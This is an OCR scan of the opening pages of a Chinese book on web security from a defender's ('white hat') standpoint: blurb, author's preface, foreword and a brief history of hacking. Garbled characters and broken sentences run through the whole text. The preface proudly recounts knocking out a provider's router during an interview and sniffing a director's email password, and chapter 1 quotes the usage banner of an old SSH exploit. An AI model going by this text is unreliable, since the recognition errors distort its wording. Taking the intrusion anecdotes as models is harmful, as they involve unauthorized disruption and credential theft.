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本 书 根据 实 伴 玉 副 总 哉 天 朝 请 ， 在 顶级 互联 网 公司 硬 干 年 的 交际 工作 择 骆 而 写成 ， 在 解决 
廊 案 上 县 有 极 强 的 可 探 作 性 ; RAMS BERNER ER, Mee Lia RHE 
WB: 对 安全 开发 流程 与 运营 的 介绍 ,同样 县 有 深刻 的 行业 指 寺 意 愉 。 气 纪念 版 祖 与 前 
版 内 容 相 同 ， 恨 为 纪念 诛 作 k 坟 多 种 全 言 储 全 球 宕 行 的 特殊 版 本 ， 人 请 使者 按 斋 选用 。 
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Web 安 全 第 一 书 ， 国 内 唯一 多 语 全 球 发 行 安全 著作 ， 最 佳 原创 技术 书 
ARSE, EE! - 

互联 网 时 代 的 数据 安全 与 个 人 隐私 受到 前 所 未 有 的 挑战 ， 各 种 新 奇 的 
攻击 技术 层出不穷 。 如 何 才能 更 好 地 保护 我 们 的 数据 ? 本 书 将 带 你 走 
进 Web 安 全 的 世界 ， 让 你 了 解 Web 安 全 的 方方面面 。 


本 书 根 据 安全 至 副 总 裁 美 天 清 ， 在 顶级 互联 网 公司 奉 干 年 的 实际 工作 
经 验 而 写成 ， 在 解决 方案 上 具有 极 强 的 可 操作 性 ;深入 分 析 诸 多 错误 
的 方法 及 误区 ， 对 安全 工作 者 有 很 好 的 参考 价值 ， 对 安全 开发 流程 与 
运营 的 介绍 ， 同 样 具有 深刻 的 行业 指导 意义 。《 纪 念 版 》 与 前 版 内 容 
相同 ， 仅 为 纪念 原作 以 多 种 语言 在 全 球 发 行 的 特殊 版 本 ， 清 读者 按 需 


选用 


Bil E 

在 2010 年 年 中 的 时 候 ， 博 文 视点 的 张 春 雨 完 生 找到 我 ， 布 望 我 可 以 写 
一 本 关于 云 计算 安全 的 书 。 当 时 云 计 算 的 概念 正如 日 中 天 ， 但 市 面 上 
天 于 云 计算 安全 应 该 怎么 做 却 缺 乏 足 够 的 资料 。 我 由 于 工作 的 关系 接 


触 这 方面 比较 多 ， 但 考虑 到 云 计 算 的 未 来 尚未 清晰 ， 以 及 其 他 的 种 种 
人 人 婉拒 了 张 春 十 先生 的 要 求 ， 转 而 决定 写 一 本 关于 Web 安 全 的 
我 的 安全 之 路 


我 对 安全 的 兴趣 起 源 于 中 学 时 期 。 当 时 在 盗版 市 场 天 到 了 一 本 没有 书 
号 的 黑客 手册 ， 其 中 coolfire 的 黑客 教程 令 我 印象 深刻 。 此 后 在 有 限 的 
能 接触 到 互联 网 的 机 会 里 ， 我 总 会 想方设法 地 寻找 一 些 黑客 教程 ， 并 
以 实践 其 中 记载 的 方法 为 乐 。 

在 2000 年 的 时 候 ， 我 进入 了 西安 交通 大 学 学 习 。 在 大 学 期 间 ， 最 大 的 
收获 ， 是 学 校 的 计算 机 实验 室 平时 会 对 学 生 开 放 。 当 时 上 网 的 资费 仍 
然 较 贵 ， 父 母 给 我 的 生活 费 里 ， 除 了 留 下 必要 的 生活 所 需 费 用 之 外 ， 
几乎 全 部 投入 在 这 里 。 也 是 在 学 校 的 计算 机 实验 宇 里 ， 让 我 迅速 在 这 
个 领域 中 成 长 起 来 。 

大 学 期 间 ， 在 父母 的 质 助 下 ， 我 拥有 了 目 己 的 第 一 台 个 人 电脑 ， 这 加 
快 了 我 成 长 的 步伐 。 与 此 同时 ， 我 和 一 些 互联 网 上 志同道合 的 朋友 ， 
一 起 建立 了 一 个 技术 型 的 安全 组 织 ， 名 字 来 源 于 我 当时 最 喜爱 的 一 部 
动漫 : “幻影 旅 团 ”(ph4nt0m.org) ° MATRE, “幻影 ?由 于 种 种 原 
因 未 能 得 以 延续 ， 但 它 却 曾 以 论坛 的 形式 培养 出 了 当今 安全 行业 中 非 
第 多 的 顶尖 人 才 。 这 也 是 我 在 这 短 短 二 十 余 载 人 生 中 的 最 大 成 吏 与 目 
Be o 
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乎 见证 了 全 部 互联 网 安全 技术 的 发 展 过 程 。 在 前 5 年 ， 我 投入 了 大 量 精 
力 研究 渗透 测 斌 技术、 缓冲 区 次 出 技术 、 网 络 攻击 技术 等 ， 而 在 后 5 
年 ， 出 于 工作 需要 ， 我 把 主要 精力 放 在 了 对 Web 安 全 的 研究 上 。 

加 入 阿里 巴巴 

发 生 这 种 专业 方 同 的 转变 ， 是 因为 在 2005 年 ， 我 在 一 位 摹 友 的 推荐 
下 ， 加 入 了 阿里 巴巴 。 加 入 的 过 程 颇 具 传 奇 色 彩 ， 在 面试 的 过 程 中 主 
管 要 求 我 展示 目 己 的 能 力 ， 于 是 我 远程 关闭 了 阿里 巴巴 内 网 上 游 运 营 
商 的 一 台 路 由 设备 ， 导 人 致 阿里 巴巴 内 部 网 络 中 断 。 事 后 主管 立即 要 求 
与 运营 商 重新 签订 可 用 性 协议 。 


大 学 时 期 的 兴趣 爱好 ， 居 然 可 以 变 成 一 份 正 经 的 职业 (当时 很 多 大 学 
都 尚未 开设 网 络 安全 的 课程 与 专业 ) ， 这 使 得 我 的 父母 很 震惊 ， 同 时 
也 更 坚定 了 我 目 己 以 此 作为 事业 的 想法 。 

在 阿里 巴巴 我 很 快 就 靳 露头 角 ， 曾 经 在 内 网 中 通过 网 络 嗅 探 捕获 到 了 
开发 总 监 的 邮箱 密码 ;也 曾经 在 压力 测试 中 一 瞬间 瘫痪 了 公司 的 网 
络 ; 还 有 好 几 次 ， 成 功 获取 到 了 域 控 服务 郁 的 权限 ， 从 而 可 以 以 管理 
员 的 映 份 进入 任何 一 位 员工 的 电脑 。 

但 这 些 工作 成 果 ， 都 远 远 比 不 上 那 厚 厚 的 一 把 网 站 安全 评估 报告 让 我 
更 有 成 殉 感 ， 因 为 我 知道 ， 网 站 上 的 每 一 个 漏洞 ， 都 在 影响 着 成 和 上 
万 的 用 户 。 能 够 为 百 万 、 于 万 的 互联 网 用 户 服务 ， 让 我 倍 感 目 紧 。 当 
时 ，Web 正 在 逐渐 成 为 互联 网 的 核心 ，Web 安 全 技术 也 正在 兴起 ， 于 
征 我 义无返顾 地 投入 到 对 Web 安 全 的 研究 中 。 

我 于 2007 年 以 23 罗 之 龄 成 为 了 阿里 巴巴 集团 最 年 轻 的 扩 术 专家 。 虽 未 
有 官方 统计 ， 但 可 能 也 是 全 集团 里 最 年 轻 的 高 级 扩 术 专家 ， 我 于 2010 
年 获 此 殊 采 。 在 阿里 巴巴 ， 我 有 笠 见 证 了 安全 部 门 从 无 到 有 的 建设 过 
程 。 同 时 由 于 淘宝 、 文 付 宇 草创 ， 沿 未 建立 目 己 的 安全 团队 ， 因 此 我 
有 垩 参与 了 淘宝 、 文 付 宝 的 安全 建设 ， 为 他 们 葛 定 了 安全 开发 框架 、 
安全 开发 流程 的 基础 。 


对 互联 网 安全 的 思考 

当时 ， 我 隐隐 地 感觉 到 了 互联 网 公司 安全 ， 与 传统 的 网 络 安全 、 信 息 
安全 技术 的 区 别 。 束 如 同 开 发 者 会 遇 到 的 挑战 一 样 ， 有 很 多 问题 ， 不 
放 到 一 个 海量 用 户 的 环境 下 ， 是 难以 暴露 出 来 的 。 由 于 量变 引起 质 
变 ， 所 以 管理 10 台 服务 右 ， 和 管理 1 万 台 服 务 右 的 方法 肯定 会 有 所 区 
All; 同样 的 ， 评 售 10 名 工程 师 的 代码 安全 ， 和 评估 1000 名 工程 师 的 代 
码 安全 ， 方 法 肯定 也 要 有 所 不 同 。 

互联 网 公司 安全 还 有 一 些 鲜明 的 特色 ， 比 如 注重 用 户 体 验 、 注 重 性 
能 、 注 重 产品 发 布 时 间 ， 因 此 传统 的 安全 方案 在 这 样 的 环境 下 可 能 完 
全 行 不 通 。 这 对 安全 工作 提出 了 更 高 的 要 求 和 更 大 的 挑战 。 

这 些 问题 ， 使 我 感觉 到 ， 互 联网 公司 安全 可 能 会 成 为 一 门 新 的 学 科 ， 
或 者 说 应 该 把 安全 技术 变 得 更 加 工业 化 。 可 是 我 在 书店 中 ， 却 发 现 安 
全 类 目的 书 ， 要 么 是 极为 学 术 化 的 〈 一 般 人 看 不 懂 ) 教科 书 ， 要 么 就 
是 极为 娱乐 化 的 〈 比 如 一 些 * 黑 客 工具 说 明 书 ”类 型 的 书 ) 说 明 书 。 极 
少数 能 够 深入 剖析 安全 技术 原理 的 书 ， 以 我 的 经 验 看 来 ， 在 工业 化 的 
环境 中 也 会 存在 各 种 各 样 的 问题 。 


这 些 问 题 ， 也 就 促使 我 戎 发 了 一 种 写 一 本 目 己 的 书 ， 分 至 多 年 来 工作 
心得 的 想法 。 它 将 是 一 本 阐述 安全 技术 在 企业 级 应 用 中 实践 的 书 ， 荐 
一 本 大 型 互联 网 公司 的 工程 师 能 够 真正 用 得 上 的 安全 参考 书 。 因 此 张 
和 


Web 是 互联 网 的 核心 ， 是 未 来 云 计算 和 移动 互联 网 的 最 佳 载体 ， 因 此 
Web 安 全 也 是 互联 网 公司 安全 业务 中 最 重要 的 组 成 部 分 。 我 近年 来 的 
研究 重心 也 在 于 此 ， 因 此 将 选 题 范围 定 在 了 Web 安 全 。 但 其 实 本 书 的 
很 多 思路 并 不 局 限于 Web 安 全 ， 而 是 可 以 放宽 到 整个 互联 网 安全 的 方 
方面 面 之 中 。 

掌握 了 以 正确 的 思路 去 看 待 安全 问题 ， 在 解决 它们 时 ， 都 将 无 往 而 不 
利 。 我 在 2007 年 的 时 候 ， 意 识 到 了 掌握 这 种 正确 思维 方式 的 重要 性 ， 
因此 我 告知 好 友 : 安全 工程 师 的 核心 竞争 力 不 在 于 他 能 拥有 和 多少 个 
0day， 掌 握 多 少 种 安全 技术 ， 而 是 在 于 他 对 安全 理解 的 深度 ， 以 及 由 
i 申 的 看 待 安全 问题 的 角度 和 高 度 。 我 是 如 此 想 的 ， 也 是 如 此 做 
因此 在 本 书 中 ， 我 认为 最 可 贵 的 不 是 那 一 个 个 工业 化 的 解决 方案 ， 而 
是 在 解决 这 些 问题 时 ， 背 后 的 思考 过 程 。 我 们 不 是 要 做 一 个 能 够 解决 
问题 的 方案 ， 而 是 要 做 一 个 能 够 “漂亮 地 ”解决 问题 的 方案 。 这 是 每 一 
名 优秀 的 安全 工程 师 所 应 有 的 追求 。 

安全 启蒙 运动 

然而 在 当今 的 互联 网 行业 中 ， 对 安全 的 重视 程度 普遍 不 高 。 有 统计 显 
示 ， 互 联网 公司 对 安全 的 投入 不 足 收 入 的 百 分 之 一 。 

在 2011 年 岁 末 之 际 ， 中 国 互联 网 突然 着 入 了 一 场 有 史 以 来 最 大 的 安全 
危机 。12 月 21 日 ， 国 内 最 大 的 开发 者 社区 CSDN 被 黑客 在 互联 网 上 公 
布 了 600 万 注册 用 户 的 数据 。 更 糟糕 的 是 ，CSDN 在 数据 库 中 明文 保存 
了 用 户 的 密码 。 接 下 来 如 同一 场 盛大 的 交响 乐 ， 黑 客 随 后 陆续 公布 了 
网 易 、 人 人 人、 天涯 、 猫 扑 、 多 玩 等 多 家 大 型 网 站 的 数据 库 ， 一 时 间 风 
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条 巨大 的 黑色 产业 链 。 这 次 的 偶然 事件 使 之 浮 出 水 面 ， 公 之 于 众 ， 也 
让 用 户 清醒 地 认识 到 中 国 互联 网 的 安全 现状 有 多 么 糟糕 。 

以 往 类 似 的 事件 我 都 会 在 博客 上 说 点 什么 ， 但 这 次 我 保持 了 沉默 。 因 
为 一 来 知道 此 种 状况 已 经 多 年 ， 网 站 只 是 在 为 以 前 的 不 作为 而 买单 ; 
二 来 要 解决 “ 拖 库 ”的 问题 ， 其 实 是 要 解决 整个 互联 网 公司 的 安全 问 


题 ， 远 非 保证 一 个 数据 库 的 安全 这 么 简单 。 这 不 是 通过 一 段 文字 、 一 
篇 文章 就 能 够 讲 清楚 的 。 但 我 想 最 好 的 答案 ， 可 以 在 本 书 中 找到 。 
经 历 这 场 危 机 之 后 ， 希 望 整个 中 国 互 联网 ， 在 安全 问题 的 认识 上 ， 能 
够 有 一 个 新 的 高 度 。 那 这 场 危机 也 就 物 有 所 值 ， 或 许 还 能 借 此 契机 成 
就 中 国 互联 网 的 一 场 安全 启蒙 运动 。 

这 是 我 的 第 一 本 书 ， 也 是 我 坚持 自己 一 个 人 写 完 的 书 ， 因 此 可 以 在 书 
中 尽情 地 阑 述 自己 的 安全 世界 观 ， 且 对 书 中 的 任何 错漏 之 处 以 及 不 成 
熟 的 观点 都 没有 可 以 推 印 责任 的 借口 。 

由 于 工作 繁忙 ， 写 此 书 只 能 利用 业余 时 间 ， 交 稿 时 间 多 次 推迟 ， 深 感 
写 书 的 不 易 。 但 最 终 能 成 书 ， 则 有 赖 于 各 位 亲朋 的 支持 ， 以 及 编辑 的 
鼓励 ， 在 此 深 表 感谢 。 本 书 中 很 多 地 方 未 能 写 得 更 为 深入 细致 ， 实 力 
精力 有 限 所 致 ， 尚 请 多 多 包涵 。 

关于 白 帽子 

在 安全 圈子 里 ， 素 有 “ 白 帽 *"、“ 黑 帼 "一 说 。 

黑 帽子 是 指 那些 造成 破坏 的 黑客 ， 而 白 帽 子 则 是 研究 安全 ， 但 不 造成 
破坏 的 黑客 。 白 帽子 均 以 建设 更 安全 的 互联 网 为 已 任 。 

我 于 2008 年 开始 在 国内 互联 网 行业 中 倡导 白 帽子 的 理念 ， 并 联合 了 一 
些 主要 互联 网 公司 的 安全 工程 师 ， 建 立 了 白 帽子 社区 ， 旨 在 交流 工作 
中 遇 到 的 各 种 间 题 ， 以 及 经 验 心得 。 

本 书 名 为 《 白 帽子 讲 Web 安 全 》， 即 是 站 在 白 帽 子 的 视角 ， 讲 述 Web 
安全 的 方方面面 。 虽 然 也 剖析 攻击 原理 ， 但 更 重要 的 是 如 何 防范 这 些 
问题 。 同 时 也 希望 * 白 帽子 * 这 一 理念 ， 能 够 更 加 的 广为人知 ， 为 中 国 
互联 网 所 接受 。 

本 书 结构 

全 书 分 为 4 大 篇 共 18 章 ， 读 者 可 以 通过 浏览 目录 以 进一步 了 解 各 篇 章 的 
内 容 。 在 有 的 章节 末尾 ， 还 附 上 了 笔者 曾经 写 过 的 一 些 博客 文章 ， 可 
以 作为 延伸 阅读 以 及 本 书 正文 的 补充 。 

第 一 篇 ”我 的 安全 世界 观 是 全 书 的 纲领 。 在 此 篇 中 先 回顾 了 安全 的 历 
史 ， 然 后 阐述 了 笔者 对 安全 的 看 法 与 态度 ， 并 提出 了 一 些 思考 问题 的 
方式 以 及 做 事 的 方法 。 理 解 了 本 篇 ， 就 能 明白 全 书 中 所 涉及 的 解决 方 
案 在 抉择 时 的 取舍 。 

第 二 篇 “客户 端 脚本 安全 就 当前 比较 流行 的 客户 端 脚本 攻击 进行 了 深 
入 盖 述 。 当 网 站 的 安全 做 到 一 定 程度 后 ， 黑 客 可 能 难以 再 找到 类 似 注 


入 攻击 、 脚 本 执行 等 高 风险 的 漏洞 ， 从 而 可 能 将 注意 力 转移 到 客户 端 

脚本 攻击 上 。 

客户 问 脚 本 安全 与 浏览 器 的 特性 居 恩 相关 ， 因 此 对 浏 咒 絮 的 深入 理解 

将 有 助 于 做 好 客户 端 脚本 安全 的 解决 方案 。 

如 采 读 者 所 要 解决 的 问题 比较 严峻 ， 比 如 网 站 的 安全 是 从 去 开始 ， 则 

建议 跳 过 此 篇 ， 移 阅读 下 一 篇 “服务 需 端 应 用 安全 ”， 解 决 优 移 级 更 高 

的 安全 问题 。 

第 三 篇 ”服务 絮 端 应 用 安全 就 常见 的 服务 右 端 应 用 安全 问题 进行 了 阅 

述 。 这 些 问 题 往往 能 引起 非常 严重 的 后 果 ， 在 网 站 的 安全 建设 之 初 需 

要 优先 解决 这 些 问题 ， 避 人 免 留 下 任何 隐患 。 

第 四 篇 ”互联 网 公司 安全 运 党 提出 了 一 个 大 安全 运营 的 思想 。 安 全 是 

一 个 持续 的 过 程 ， 最 终 仍然 要 由 安全 工程 师 来 保证 结 

在 本 篇 中 ， 首 先 就 互联 网 业务 安全 问题 进行 了 一 些 讨论 ， 这 些 问题 对 

于 互联 网 公司 来 说 有 时 候 会 比 漏洞 更 为 重要 o 

在 接 下 来 的 两 草 中 ， 首 先 阐述 了 安全 开发 流程 的 实施 过 程 ， 以 及 笔者 

积累 的 一 些 经 验 。 然 后 谈 到 了 公司 安全 团队 的 职责 ， 以 及 如 何 建立 一 

个 健康 完善 的 安全 体系 。 

本 书 也 可 以 当做 一 本 安全 参考 书 ， 读 者 在 遇 到 问题 时 ， 可 以 挑选 任何 

所 需要 的 章节 进行 阅读 
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隔离 的 小 乡村 里 ， 在 这 可 以 夜 不 财 户 的 小 乡村 里 ， 过 着 与 网 络 无 关 、 
与 安全 无 天 的 生活 ， 而 我 终于 可 以 有 时间 安安 静 静 拜读 吴 翰 清 先 生 的 
这 本 大 作 了 。 

认识 吴 博 清 先 生源 于 网 络 、 源 于 安全 ， 并 从 网 络 走 向 生活 ， 成 为 朋 
友 。 他 对 于 安全 技术 和 孜孜 不 倦 的 研究 ， 使 得 他 年 纪 轻 轻便 成 为 系统 、 
网 络 、Web 等 多 方面 安全 的 专家 ; 他 对 于 安全 技术 的 分 享 ， 创 建 了 “ 幻 
影 旅 团 ”(ph4nt0m.org) 组 织 ， 培 养 了 一 批 安全 方面 的 技术 人 才 ， 并 
带动 了 整个 行业 的 交流 氛围 ， 他 和 同事 在 大 型 互联 网 公司 对 安全 方面 
的 不 断 实践 ， 全 面 保护 着 阿里 巴巴 集团 的 安全 ; 他 对 于 安全 的 反思 和 
总 结 并 发 布 在 他 的 博客 上 ， 使 得 我 们 能 够 更 为 深入 地 理解 安全 的 意 
义 ， 处 理 安全 问题 的 方法 论 。 而 今天 ， 很 笠 运 ， 我 们 能 系统 的 地 看 到 
吴 翰 清 先 生 多 年 在 大 型 互联 网 公司 工作 实践 、 总 结 反思 所 积累 的 安全 
观 和 Web 安 全 技术 。 

中 国人 自己 编写 的 安全 专著 不 多 ， 而 在 这 为 数 不 多 的 书 中 ， 绝 大 部 分 
也 都 是 “黑客 攻击 ?速成 手册 。 这 些 书 除了 在 技术 上 仅 立 足 于 零碎 的 技 
术 点 、 工 具 使 用 手册 、 攻 击 过程 演 示 ， 不 系统 之 外 ， 更 为 关键 的 是 ， 
它们 不 是 以 建设 者 的 角度 去 解决 安全 问题 。 吴 朝 清 先生 是 我 非常 佩服 
的 “日 帽子 *， 他 和 一 群 志 同道 合 的 朋友 ， 一 直 以 建设 更 安全 的 互联 网 
为 己任 ， 系 统 地 人 研究 安全 ， 积 极 分 享 知识 ， 为 中 国 的 互联 网 安全 添 态 
加 瓦 。 而 这 本 书 也 正 是 站 在 白 帽子 的 视角 ， 讲 述 Web 安 全 的 方 方 面 
面 ， 它 剖析 攻击 原理 ， 目 的 是 让 互联 网 开发 者 、 技 术 人 员 了 解 原 理 ， 
并 通过 自身 的 实践 ， 告 诉 大 家 分 析 这 些 问 题 的 方法 论 、 思 想 以 及 对 应 
的 防范 方案 。 

最 让 我 共鸣 的 是 “安全 运营 ”的 思路 ， 我 相信 这 也 是 匡 翰 清 先 生 这 人 么 多 
年 在 互联 网 公司 工作 的 最 大 收获 之 一 ， 因 为 运营 是 互联 网 公司 的 最 大 
特色 和 法 至 。 安 全 是 一 个 动态 的 过 程 ， 因 为 敌 方 攻击 手段 在 变 ， 攻 击 
方法 在 变 ， 漏 洞 不 断 出 现 ; RT UKE, PES, ARES, ZB 
图 通过 一 个 系统 、 一 个 方案 解决 所 有 的 问题 是 不 现实 的 ， 也 是 不 可 能 
的 ， 安 全 需要 不 断 地 运营 、 持 续 地 优化 。 

瑞雪 焰 丰 年 ， 一 直 在 下 的 雪 预 示 着 今年 的 丰收 。 我 想 在 经 历 了 2011 年 
中 国 互 联网 最 大 安全 危机 之 后 ， 如 自 雪 一 样 纯洁 的 《 白 帽 子 讲 Web 安 
全 》 应 该 会 给 广大 的 从 事 互 联网 技术 人 员 带 来 更 多 的 帮助 ， 保 障 中 国 
互联 网 的 安全 ， 迎 来 互联 网 的 又 一 个 春天 。 
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第 一 篇 世界 观 安全 
第 1 章 我 的 安全 世界 观 


互联 网 本 来 是 安全 的 ， 目 从 有 了 研究 安全 的 人 之 后 ， 互 联网 束 变 得 不 


安全 了 。 


1.1 Web 安 全 简 史 
起 初 ， 人 研究 计算 机 系统 和 网 络 的 人 ， 被 称 为 “Hacker”"， 他 们 对 计算 机 系 
统 有 着 深入 的 理解 ， 因 此 往往 能 够 发 现 其 中 的 问题 。“Hacker”* 在 中 国 按 
照 音译 ， 被 称 为 “黑客 *。 在 计算 机 安全 领域 ,黑客 是 一 群 破坏 规则 、 
不 喜欢 被 拘束 的 人 ， 因 此 总 想 着 能 够 找到 系统 的 漏洞 ， 以 获得 一 些 规 
则 之 外 的 权力 。 
对 于 现代 计算 机 系统 来 说 ,在 用 户 态 的 最 高 权限 是 root 
(administrator) ， 也 是 黑客 们 最 渴望 能 够 获取 的 系统 最 高 权 
i o "root" X] BANS], WARKI AS AI GI, Se ERES 
不 想 拿 到 “roop" 的 黑客， 不 是 好 墨客。 漏洞 利用 代码 能 够 帮助 黑客 们 达 
成 这 一 目标 。 黑 客 们 使 用 的 漏洞 利用 代码 ， 被 称 为 “exploit*。 在 黑客 的 
世界 里 ， 有 的 墨客， 精通 计算 机 技术 ， 能 目 己 控 据 漏洞 ， 并 编写 
exploit; 而 有 的 黑客 ， 则 只 对 攻击 本 身 感 兴趣 ， 对 计算 机 原理 和 各 种 编 
程 技术 的 了 解 比较 粗浅 ， 因 此 只 懂得 编译 别人 的 代码 ， 目 己 并 没有 动 
手 能 力 ， 这 种 墨客 被 称 为 “Script Kids”， 即 “脚本 小 和子”。 在 现实 世界 
里 ， 真 正 造成 破坏 的 ， 往 往 并 非 那 些 挖掘 并 人 研究 漏洞 的 “墨客 ” 们 ， 而 
是 这 些 脚 本 小 子 。 而 在 今天 已 经 形成 产业 的 计算 机 犯罪 、 网 络 犯 罪 
中 ， 造 成 主要 破坏 的 ， 也 是 这 些 “ 脚 本 小 子 ”。 
111 PREAH 
中 国 墨客 的 发 展 分 为 几 个 阶段 ， 到 今天 已 经 形成 了 一 条 黑色 产业 链 。 
笔者 把 中 国 黑 客 的 发 展 分 为 了 : 启蒙 时 代 、 黄 金 时 代 、 黑 上 暗 时 代 。 
首先 是 启蒙 时 代 ， 这 个 时 期 大 概 处 在 20 世 纪 90 年 代 ， 此 时 中 国 的 互联 
网 也 刚刚 处 于 起 步 阶 段 ， 一 些 热 爱 新 兴 技 术 的 青年 受到 国外 黑客 技术 
的 有 影响， 开始 研究 安全 汤 洞 。 启 蒙 时 代 的 黑客 们 大 多 是 由 于 个 人 爱好 
而 走 上 这 条 道路 ， 好 奇 心 与 求知 欲 是 驱使 他 们 前 进 的 动力 ， 没 有 任何 
利益 的 瓜葛 。 这 个 时 期 鸭 中 国 墨 客 们 通过 互联 网 ， 看 到 了 世界 ， 因 此 
与 西方 发 达 国 家 同期 诞生 的 黑客 精神 是 一 脉 相 传 的 ， 他 们 崇尚 分 享 、 
目 由 、 免 费 的 互联 网 精神 ， 并 热衷 于 分 享 目 己 的 最 靳 研究 成 果 。 
接 下 来 是 黄金 时 代 ， 这 个 时 期 以 中 美 黑客 大 战 为 标志 。 在 这 个 历史 背 
景 下 ， 墨 客 这 个 特殊 的 群体 一 下 于 几乎 吸引 了 社会 的 所 有 了 眼球， 而 此 
时 墨客 圈子 所 宣扬 的 墨客 文化 以 及 墨客 技术 的 独特 魅力 也 吸引 了 无 数 
的 青少年 走 上 这 条 道路 。 目 此 事件 后 ， 各 种 黑客 组 织 如 雨后春笋 般 冒 
出 。 此 阶段 的 中 国 黑 客 ， 其 普遍 的 特点 是 年 轻 ， 有 活力 ， 充 满 激情 ， 
但 在 技术 上 也 许 还 不 够 成 熟 。 此 时 期 黑客 圈子 里 贩卖 漏洞 、 恶 意 软件 
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为 目的 的 攻击 行为 ， 黑色 产业 链 逐 渐 成 型 。 

最 后 是 黑暗 时 代 ， 这 个 阶段 从 几 年 前 开始 一 直 延 续 到 今天 ， 也 许 还 将 
继续 下 去 。 在 这 个 时 期 黑客 组 织 也 遵循 着 社会 发 展 规律 ， 优 胜 劣 汰 ， 
大 多 数 的 墨客 组 织 没 有 坚持 下 来 。 在 上 一 个 时 期 非常 流行 的 黑客 技术 
论坛 越 来 越 缺 乏 人 气 ， 最 终 走 同 没落 。 所 有 门户 型 的 漏洞 披露 站 点 ， 
也 不 再 公布 任何 漏洞 相关 的 技术 细节 。 

伴随 着 安全 产业 的 发 展 ， 黑 客 的 功利 性 越 来 越 强 。 黑 色 产 业 链 开始 成 
熟 ， 这 个 地 下 产业 每 年 都 会 给 互联 网 造成 数 十 亿 的 损失 。 而 在 上 一 个 
时 期 技术 还 不 成 熟 的 墨客 们 ， 凡 是 坚持 下 来 的 ， 都 已 经 成 长 为 安全 领 
域 的 高 级 人 才 ， 有 的 在 安全 公司 贡献 着 自己 的 专业 技能 ， 有 的 则 带 着 
非常 强 的 技术 进入 了 黑色 产业 。 此 时 期 的 墨客 群体 因为 互相 之 间 缺 失 
Pn ns 最 为 纯粹 的 墨客 精神 实质 上 已 
ET ° 
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数 千 万 的 网 民 受 害 ， 以 及 黑客 精神 的 死亡 ， 使 得 我 们 没有 理由 不 把 此 
时 称 为 墨 暗 时 代 。 也 许 墨 客 精 神 所 代表 的 Open、EFree、Share， 真 的 一 
去 不 复 返 了 ! 

11.2 黑客 技术 的 发 展 历程 

从 黑客 技术 发 展 的 角度 看 ， 在 早期 黑客 攻击 的 目标 以 系统 软件 大 
多 。 一 方面 ， 是 由 于 这 个 时 期 的 Web 技 术 发 展 还 远 远 不 成 熟 ， 男 一 方 
面 ， 则 是 因为 通过 攻击 系统 软件 ， 墨 客 们 往往 能 够 直接 获取 root 权 限 。 
这 段 时 期 ， 涌 现 出 了 非常 多 的 经 典 漏洞 以 及 “exploit”。 比 如 著名 的 墨客 
组 织 TESO， 就 曾经 编写 过 一 个 攻击 SSH 的 exploit， 并 公然 在 ex-ploit 的 
banner 中 宣称 曾经 利用 这 个 exploit 入 侵 过 cia.gov (美国 中 央 情 报 局 ) 。 
下 面 是 这 个 exploit 的 一 些 信 息 。 


n >> ./ssh 
linux/x86 sshdi exploit by zip/TESO 
(zip@james.kalifornia.com) - ripped from 
openssh 


src 

greets: mray, random, big t, shifty, scut, 
orak 

ps. this sploit already owned cia.gov :/ 

**please pick a type** 

Usage: ./ssh host [options] 

Opti $ 


p port 

-b base Base address to start bruteforcing 
distance, by default 0x1800, 
goes as high as 0x10000 

-t type 


d debug mod 
o Add this to delta_min 


types: 

0: linux/x86 ssh.com 1.2.26-1.2.31 rhl 

T ux/x86 openssh 1.2.3 (maybe others) 

2 86 op sh 2.2.0p1 (mayb thers) 


$ ux/x86 opens aybe other 
3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl 


有 趣 的 是 ， 这 个 exploit 还 曾经 出 现在 著名 电影 《黑客 帝国 2》 中 : 


电影 《黑客 帝国 2》 
放大 屏幕 上 的 文字 可 以 看 到 


Parts 10 
State canned 
pen 


edia a $92 
root ^1 《9》 10%. 


电影 《黑客 帝国 2》 中 使 用 的 著名 exploit 

在 早期 互联 网 中 ，Web 并 非 互联 网 的 主流 应 用 ， 相 对 来 说 ， 基 于 
SMTP、POP3、FTP、IRC 等 协议 的 服务 拥有 着 绝 大 多 数 的 用 户 。 因 此 
黑客 们 主要 的 攻击 目标 是 网 络 、 操 作 系 统 以 及 软件 等 领域 ，Web 安 全 领 
域 的 攻击 与 防御 技术 均 处 于 非常 原始 的 阶段 。 


相对 于 那些 攻击 系统 软件 的 exploit 而 言 ， 基 于 Web 的 攻击 ， 一 般 只 能 让 
E 
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但 是 时 代 在 发 展 ， 防 火 墙 技术 的 兴起 改变 了 互联 网 安全 的 格局 。 尤 其 
是 以 Cisco、 华 为 等 为 代表 的 网 络 设备 三 两 ， 开 始 在 网 络 产 品 中 更 加 重 
视 网 络 安全 ， 最 终 改 变 了 互联 网 安全 的 走 同 。 防 火 墙 、ACL 技 术 的 兴 
起 ， 使 得 直接 又 露 在 互联 网 上 的 系统 得 到 了 保护 。 

比如 一 个 网 站 的 数据 库 ， 在 没有 保护 的 情况 下 ， 数 据 库 服务 端口 是 允 
许 任 何人 随意 连接 的 ， 在 有 了 防火 墙 的 保护 后 ， 通 过 ACL 可 以 控制 只 
允许 信任 来 源 的 访问 。 这 些 措施 在 很 大 程度 上 保证 了 系统 软件 处 于 信 
任 边界 之 内 ， 从 而 杜绝 了 大 部 分 的 攻击 来 源 。 

2003 年 的 冲击 波 蠕虫 是 一 个 里 程 碑 式 的 事件 ， 这 个 针对 Windows 操 作 系 
统 RPC 服 务 (运行 在 445 端 口 ) 的 蠕虫 ， 在 很 短 的 时 间 内 席卷 了 全 球 ， 
造成 了 数 百 万 台 机 器 被 感染 ， 损 失 难 以 估量 。 在 此 次 事件 后 ， 网 络 运 
营 商 们 很 坚决 地 在 骨干 网 络 上 屏蔽 了 135、445 等 端口 的 连接 请 求 。 此 
次 事件 之 后 ， 整 个 互联 网 对 于 安全 的 重视 达到 了 一 个 空前 的 高 度 。 

运 香 商 、 防 火 墙 对 于 网 络 的 封锁 ， 使 得 又 露 在 互联 网 上 的 非 Web 服 务 越 
来 越 少 ， 且 Web 技 术 的 成 熟 使 得 web 应 用 的 功能 越 来 起 强大， 最终 成 为 
了 互联 网 的 主流 。 墨 客 们 的 目光 ， 也 渐渐 转移 到 了 Web 这 块 大 蛋糕 上 © 
实际 上 ， 在 互联 网 安全 领域 所 经 历 的 这 个 阶段 ， 还 有 另外 一 个 重要 的 
分 支 ， 即 桌面 软件 安全 ， 或 者 叫 客 户 端 软件 安全 。 其 代表 是 浏览 器 攻 
击 。 一 个 典型 的 攻击 场景 是 ， 墨 客 构造 一 个 恶意 网 页 ， 诱 使 用 户 使 用 
